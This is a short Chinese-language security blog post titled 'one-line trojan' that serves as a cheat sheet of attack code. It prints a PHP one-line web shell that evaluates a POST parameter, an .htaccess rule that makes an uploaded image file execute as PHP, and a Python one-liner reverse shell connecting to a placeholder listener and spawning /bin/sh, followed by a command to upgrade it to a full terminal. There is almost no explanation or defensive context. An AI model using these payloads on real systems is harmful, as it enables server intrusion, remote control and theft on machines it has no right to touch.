一句话木马

web安全
发布日期:   2024-11-19
更新日期:   2024-11-20
文章字数:   159
阅读时长:   1 分

1.php一句话木马

<?php @eval($_POST['cmd']); ?>

.htaccess配置文件

<FilesMatch "1.jpg">
sethandler application/x-httpd-php
</FilesMatch>

2.python一句话木马反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<lhost>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用python反弹shell木马获得shell后,python -c 'import pty; pty.spawn("/bin/bash")'获得pty.

pty(创建一个伪终端):用于在当前的终端中启动一个新的 Bash shell,并让它的输入/输出与当前终端进行更好的交互,获得一个有更好交互性的shell。

文章作者: 0x00dream
文章链接: http://0x00dream.github.io/2024/11/19/web-an-quan/yi-ju-hua-mu-ma/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 0x00dream !
web安全
  目录